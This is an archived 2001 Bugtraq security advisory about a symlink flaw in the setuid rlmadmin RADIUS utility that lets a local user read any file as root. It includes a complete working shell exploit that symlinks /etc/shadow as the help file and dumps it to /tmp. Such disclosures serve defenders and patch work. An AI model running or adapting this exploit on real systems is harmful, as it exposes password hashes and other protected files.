[22557] in bugtraq
rlmadmin v3.8M view file symlink vulnerability
daemon@ATHENA.MIT.EDU (Digital Shadow)
Fri Sep 7 11:43:26 2001
Date: Fri, 7 Sep 2001 11:32:46 +0200 (MEST)
From: Digital Shadow <wodahs@gmx.net>
To: bugtraq@securityfocus.com
MIME-Version: 1.0
Message-ID: <21534.999855166@www21.gmx.net>
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit
-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --
[Ministry-Of-Peace] - Security Advisory #01 - 07th Sept 2001
rlmadmin v3.8M view file symlink vulnerability
-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --
Overview:
---------
rlmadmin is a user management utility for RADIUS which comes with the
Merit AAA Server package (http://www.merit.edu/michnet/dial-in/aaa/).
Using this program and a simple symlink, you can view any file on the
system as root.
Description:
------------
Using the -d option of rlmadmin allows you to specify the directory
in which it will look for its configuration files.
The files that it looks for in this directory during startup are:
dictionary - dictionary translations for parsing requests and
generating responses.
rlmadmin.help - the help file that is displayed on startup.
vendors - vendor specific information.
The problem occurs when rlmadmin reads from the "rlmadmin.help" file.
If this file is symlinked to another file (such as /etc/shadow), the
program blindly follows the link, causing the contents of the file to
be displayed when the program starts up.
Versions Affected:
------------------
rlmadmin v3.8M (and earlier?)
rlmadmin v5.01 Commercial (available from www.interlinknetworks.com -
this version isn't setuid root by default,
but is still affected if set by the admin)
Exploit Code:
-------------
#!/bin/sh
# -- -- -- -- -- -- -- -- -- -- -- -- -- -- #
# rlmadmin view file symlink vulnerability #
# (c)oded 2001 Digital Shadow #
# www.ministryofpeace.co.uk #
# -- -- -- -- -- -- -- -- -- -- -- -- -- -- #
bloc=/usr/private/etc # executable file location
cloc=/usr/private/etc/raddb # config file location
file=/etc/shadow # file to read
echo == rlmadmin exploit - visit \
www.ministryofpeace.co.uk for more!
echo = Initialising...
mkdir /tmp/peace; cd /tmp/peace
cp $cloc/dictionary $cloc/vendors .
ln -s $file rlmadmin.help
echo = Exploiting...
echo quit | $bloc/rlmadmin -d /tmp/peace > peace.log
mv peace.log /tmp; rm dictionary rlmadmin.help vendors
echo = Done!
echo == Now look in /tmp/peace.log!
Credits:
--------
Vulnerability discovered by Digital Shadow.
-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --
advisories[at]ministryofpeace.co.uk -- www.ministryofpeace.co.uk
-- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- --
--
Sent through GMX FreeMail - http://www.gmx.net
